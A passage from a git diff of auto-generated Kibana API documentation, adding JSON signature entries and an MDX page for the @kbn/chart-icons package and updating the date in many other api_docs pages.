"parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartAreaPercentage.$1", + "type": "Object", + "tags": [], + "label": "{\n title,\n titleId,\n ...props\n}", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_area_percentage.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": 
"def-common.IconChartAreaStacked", + "type": "Function", + "tags": [], + "label": "IconChartAreaStacked", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_area_stacked.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartAreaStacked.$1", + "type": "Object", + "tags": [], + "label": "{ title, titleId, ...props }", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_area_stacked.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartBar", + "type": "Function", + "tags": [], + "label": "IconChartBar", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_bar.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartBar.$1", + "type": "Object", + "tags": [], + "label": "{ title, titleId, ...props }", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_bar.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartBarAnnotations", + "type": "Function", + "tags": [], + "label": "IconChartBarAnnotations", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_bar_annotations.tsx", + "deprecated": false, + "children": [ + { + 
"parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartBarAnnotations.$1", + "type": "Object", + "tags": [], + "label": "{\n title,\n titleId,\n ...props\n}", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_bar_annotations.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartBarHorizontal", + "type": "Function", + "tags": [], + "label": "IconChartBarHorizontal", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_bar_horizontal.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartBarHorizontal.$1", + "type": "Object", + "tags": [], + "label": "{\n title,\n titleId,\n ...props\n}", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_bar_horizontal.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartBarHorizontalPercentage", + "type": "Function", + "tags": [], + "label": "IconChartBarHorizontalPercentage", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_bar_horizontal_percentage.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartBarHorizontalPercentage.$1", + "type": "Object", + "tags": [], + "label": "{\n title,\n titleId,\n ...props\n}", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", 
\"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_bar_horizontal_percentage.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartBarHorizontalStacked", + "type": "Function", + "tags": [], + "label": "IconChartBarHorizontalStacked", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_bar_horizontal_stacked.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartBarHorizontalStacked.$1", + "type": "Object", + "tags": [], + "label": "{\n title,\n titleId,\n ...props\n}", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_bar_horizontal_stacked.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartBarPercentage", + "type": "Function", + "tags": [], + "label": "IconChartBarPercentage", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_bar_percentage.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartBarPercentage.$1", + "type": "Object", + "tags": [], + "label": "{\n title,\n titleId,\n ...props\n}", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_bar_percentage.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + 
"id": "def-common.IconChartBarReferenceLine", + "type": "Function", + "tags": [], + "label": "IconChartBarReferenceLine", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_bar_reference_line.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartBarReferenceLine.$1", + "type": "Object", + "tags": [], + "label": "{\n title,\n titleId,\n ...props\n}", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_bar_reference_line.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartBarStacked", + "type": "Function", + "tags": [], + "label": "IconChartBarStacked", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_bar_stacked.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartBarStacked.$1", + "type": "Object", + "tags": [], + "label": "{ title, titleId, ...props }", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_bar_stacked.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartDatatable", + "type": "Function", + "tags": [], + "label": "IconChartDatatable", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": 
"packages/kbn-chart-icons/src/assets/chart_datatable.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartDatatable.$1", + "type": "Object", + "tags": [], + "label": "{ title, titleId, ...props }", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_datatable.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartDonut", + "type": "Function", + "tags": [], + "label": "IconChartDonut", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_donut.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartDonut.$1", + "type": "Object", + "tags": [], + "label": "{ title, titleId, ...props }", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_donut.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartHeatmap", + "type": "Function", + "tags": [], + "label": "IconChartHeatmap", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_heatmap.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartHeatmap.$1", + "type": "Object", + "tags": [], + "label": "{ title, titleId, ...props }", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": 
"packages/kbn-chart-icons/src/assets/chart_heatmap.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartHorizontalBullet", + "type": "Function", + "tags": [], + "label": "IconChartHorizontalBullet", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_horizontal_bullet.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartHorizontalBullet.$1", + "type": "Object", + "tags": [], + "label": "{\n title,\n titleId,\n ...props\n}", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_horizontal_bullet.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartLine", + "type": "Function", + "tags": [], + "label": "IconChartLine", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_line.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartLine.$1", + "type": "Object", + "tags": [], + "label": "{ title, titleId, ...props }", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_line.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartMetric", + "type": "Function", + "tags": [], + "label": "IconChartMetric", + "description": 
[], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_metric.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartMetric.$1", + "type": "Object", + "tags": [], + "label": "{ title, titleId, ...props }", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_metric.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartMixedXy", + "type": "Function", + "tags": [], + "label": "IconChartMixedXy", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_mixed_xy.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartMixedXy.$1", + "type": "Object", + "tags": [], + "label": "{ title, titleId, ...props }", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_mixed_xy.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartMosaic", + "type": "Function", + "tags": [], + "label": "IconChartMosaic", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_mosaic.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartMosaic.$1", + "type": "Object", + "tags": [], + "label": "{ title, titleId, 
...props }", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_mosaic.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartPie", + "type": "Function", + "tags": [], + "label": "IconChartPie", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_pie.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartPie.$1", + "type": "Object", + "tags": [], + "label": "{ title, titleId, ...props }", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_pie.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartTreemap", + "type": "Function", + "tags": [], + "label": "IconChartTreemap", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_treemap.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartTreemap.$1", + "type": "Object", + "tags": [], + "label": "{ title, titleId, ...props }", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_treemap.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartVerticalBullet", + "type": "Function", + 
"tags": [], + "label": "IconChartVerticalBullet", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_vertical_bullet.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartVerticalBullet.$1", + "type": "Object", + "tags": [], + "label": "{\n title,\n titleId,\n ...props\n}", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_vertical_bullet.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartWaffle", + "type": "Function", + "tags": [], + "label": "IconChartWaffle", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_waffle.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconChartWaffle.$1", + "type": "Object", + "tags": [], + "label": "{ title, titleId, ...props }", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/chart_waffle.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconCircle", + "type": "Function", + "tags": [], + "label": "IconCircle", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/annotation_icons/circle.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": 
"def-common.IconCircle.$1", + "type": "Object", + "tags": [], + "label": "{ title, titleId, ...props }", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/annotation_icons/circle.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconRegionMap", + "type": "Function", + "tags": [], + "label": "IconRegionMap", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/region_map.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconRegionMap.$1", + "type": "Object", + "tags": [], + "label": "{\n title,\n titleId,\n ...props\n}", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/region_map.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": false + }, + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconTriangle", + "type": "Function", + "tags": [], + "label": "IconTriangle", + "description": [], + "signature": [ + "({ title, titleId, ...props }: Omit<", + "EuiIconProps", + ", \"type\">) => JSX.Element" + ], + "path": "packages/kbn-chart-icons/src/assets/annotation_icons/triangle.tsx", + "deprecated": false, + "children": [ + { + "parentPluginId": "@kbn/chart-icons", + "id": "def-common.IconTriangle.$1", + "type": "Object", + "tags": [], + "label": "{ title, titleId, ...props }", + "description": [], + "signature": [ + "Omit<", + "EuiIconProps", + ", \"type\">" + ], + "path": "packages/kbn-chart-icons/src/assets/annotation_icons/triangle.tsx", + "deprecated": false, + "isRequired": true + } + ], + "returnComment": [], + "initialIsOpen": 
false + } + ], + "interfaces": [], + "enums": [], + "misc": [], + "objects": [] + } +} \ No newline at end of file diff --git a/api_docs/kbn_chart_icons.mdx b/api_docs/kbn_chart_icons.mdx new file mode 100644 index 0000000000000..c50bef60ef8ba --- /dev/null +++ b/api_docs/kbn_chart_icons.mdx @@ -0,0 +1,30 @@ +--- +#### +#### This document is auto-generated and is meant to be viewed inside our experimental, new docs system. +#### Reach out in #docs-engineering for more info. +#### +id: kibKbnChartIconsPluginApi +slug: /kibana-dev-docs/api/kbn-chart-icons +title: "@kbn/chart-icons" +image: https://source.unsplash.com/400x175/?github +description: API docs for the @kbn/chart-icons plugin +date: 2022-08-18 +tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/chart-icons'] +--- +import kbnChartIconsObj from './kbn_chart_icons.devdocs.json'; + + + +Contact [Owner missing] for questions regarding this plugin. + +**Code health stats** + +| Public API count | Any count | Items lacking comments | Missing exports | +|-------------------|-----------|------------------------|-----------------| +| 76 | 0 | 76 | 0 | + +## Common + +### Functions + + diff --git a/api_docs/kbn_ci_stats_core.mdx b/api_docs/kbn_ci_stats_core.mdx index 200384f716dc2..dde1bcaa9dee9 100644 --- a/api_docs/kbn_ci_stats_core.mdx +++ b/api_docs/kbn_ci_stats_core.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-ci-stats-core title: "@kbn/ci-stats-core" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/ci-stats-core plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/ci-stats-core'] --- import kbnCiStatsCoreObj from './kbn_ci_stats_core.devdocs.json'; diff --git a/api_docs/kbn_ci_stats_performance_metrics.mdx b/api_docs/kbn_ci_stats_performance_metrics.mdx index 054bc2a03faff..b7b59159634c2 100644 --- a/api_docs/kbn_ci_stats_performance_metrics.mdx +++ b/api_docs/kbn_ci_stats_performance_metrics.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-ci-stats-performance-metrics title: "@kbn/ci-stats-performance-metrics" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/ci-stats-performance-metrics plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/ci-stats-performance-metrics'] --- import kbnCiStatsPerformanceMetricsObj from './kbn_ci_stats_performance_metrics.devdocs.json'; diff --git a/api_docs/kbn_ci_stats_reporter.mdx b/api_docs/kbn_ci_stats_reporter.mdx index 21492cfbd83ad..d9bfb8667b2a6 100644 --- a/api_docs/kbn_ci_stats_reporter.mdx +++ b/api_docs/kbn_ci_stats_reporter.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-ci-stats-reporter title: "@kbn/ci-stats-reporter" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/ci-stats-reporter plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/ci-stats-reporter'] --- import kbnCiStatsReporterObj from './kbn_ci_stats_reporter.devdocs.json'; diff --git a/api_docs/kbn_cli_dev_mode.mdx b/api_docs/kbn_cli_dev_mode.mdx index f3c1405677ac7..d51e3700d16aa 100644 --- a/api_docs/kbn_cli_dev_mode.mdx +++ b/api_docs/kbn_cli_dev_mode.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-cli-dev-mode title: "@kbn/cli-dev-mode" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/cli-dev-mode plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/cli-dev-mode'] --- import kbnCliDevModeObj from './kbn_cli_dev_mode.devdocs.json'; diff --git a/api_docs/kbn_coloring.mdx b/api_docs/kbn_coloring.mdx index d01aac1cbb5fc..7705a2cf7972d 100644 --- a/api_docs/kbn_coloring.mdx +++ b/api_docs/kbn_coloring.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-coloring title: "@kbn/coloring" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/coloring plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/coloring'] --- import kbnColoringObj from './kbn_coloring.devdocs.json'; diff --git a/api_docs/kbn_config.mdx b/api_docs/kbn_config.mdx index d52e7742717d1..f39b8e20075f6 100644 --- a/api_docs/kbn_config.mdx +++ b/api_docs/kbn_config.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-config title: "@kbn/config" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/config plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/config'] --- import kbnConfigObj from './kbn_config.devdocs.json'; diff --git a/api_docs/kbn_config_mocks.mdx b/api_docs/kbn_config_mocks.mdx index fba53cbd266b6..b6ee6ead75a68 100644 --- a/api_docs/kbn_config_mocks.mdx +++ b/api_docs/kbn_config_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-config-mocks title: "@kbn/config-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/config-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/config-mocks'] --- import kbnConfigMocksObj from './kbn_config_mocks.devdocs.json'; diff --git a/api_docs/kbn_config_schema.mdx b/api_docs/kbn_config_schema.mdx index 65ebc8396ead3..c4ae0af7c4f81 100644 --- a/api_docs/kbn_config_schema.mdx +++ b/api_docs/kbn_config_schema.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-config-schema title: "@kbn/config-schema" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/config-schema plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/config-schema'] --- import kbnConfigSchemaObj from './kbn_config_schema.devdocs.json'; 
diff --git a/api_docs/kbn_core_analytics_browser.mdx b/api_docs/kbn_core_analytics_browser.mdx index b2f2731c6944a..5f6f01e888195 100644 --- a/api_docs/kbn_core_analytics_browser.mdx +++ b/api_docs/kbn_core_analytics_browser.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-analytics-browser title: "@kbn/core-analytics-browser" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-analytics-browser plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-analytics-browser'] --- import kbnCoreAnalyticsBrowserObj from './kbn_core_analytics_browser.devdocs.json'; diff --git a/api_docs/kbn_core_analytics_browser_internal.mdx b/api_docs/kbn_core_analytics_browser_internal.mdx index 2cc30f1147a1c..f2498bc39e07b 100644 --- a/api_docs/kbn_core_analytics_browser_internal.mdx +++ b/api_docs/kbn_core_analytics_browser_internal.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-analytics-browser-internal title: "@kbn/core-analytics-browser-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-analytics-browser-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-analytics-browser-internal'] --- import kbnCoreAnalyticsBrowserInternalObj from './kbn_core_analytics_browser_internal.devdocs.json'; diff --git a/api_docs/kbn_core_analytics_browser_mocks.mdx b/api_docs/kbn_core_analytics_browser_mocks.mdx index 1e2edb5eaeb95..61425d9dca3fc 100644 --- a/api_docs/kbn_core_analytics_browser_mocks.mdx +++ b/api_docs/kbn_core_analytics_browser_mocks.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-analytics-browser-mocks title: "@kbn/core-analytics-browser-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-analytics-browser-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-analytics-browser-mocks'] --- import kbnCoreAnalyticsBrowserMocksObj from './kbn_core_analytics_browser_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_analytics_server.mdx b/api_docs/kbn_core_analytics_server.mdx index cb94c8b9494fa..2f112706584ff 100644 --- a/api_docs/kbn_core_analytics_server.mdx +++ b/api_docs/kbn_core_analytics_server.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-analytics-server title: "@kbn/core-analytics-server" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-analytics-server plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-analytics-server'] --- import kbnCoreAnalyticsServerObj from './kbn_core_analytics_server.devdocs.json'; diff --git a/api_docs/kbn_core_analytics_server_internal.mdx b/api_docs/kbn_core_analytics_server_internal.mdx index cacd59f057952..c87d439806803 100644 --- a/api_docs/kbn_core_analytics_server_internal.mdx +++ b/api_docs/kbn_core_analytics_server_internal.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-analytics-server-internal title: "@kbn/core-analytics-server-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-analytics-server-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-analytics-server-internal'] --- import kbnCoreAnalyticsServerInternalObj from './kbn_core_analytics_server_internal.devdocs.json'; diff --git a/api_docs/kbn_core_analytics_server_mocks.mdx b/api_docs/kbn_core_analytics_server_mocks.mdx index 39e6f8b9cc05c..e301ffa8f211f 100644 
--- a/api_docs/kbn_core_analytics_server_mocks.mdx +++ b/api_docs/kbn_core_analytics_server_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-analytics-server-mocks title: "@kbn/core-analytics-server-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-analytics-server-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-analytics-server-mocks'] --- import kbnCoreAnalyticsServerMocksObj from './kbn_core_analytics_server_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_base_browser_mocks.mdx b/api_docs/kbn_core_base_browser_mocks.mdx index 7089249d73c1c..ddc62c4071e39 100644 --- a/api_docs/kbn_core_base_browser_mocks.mdx +++ b/api_docs/kbn_core_base_browser_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-base-browser-mocks title: "@kbn/core-base-browser-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-base-browser-mocks plugin -date: 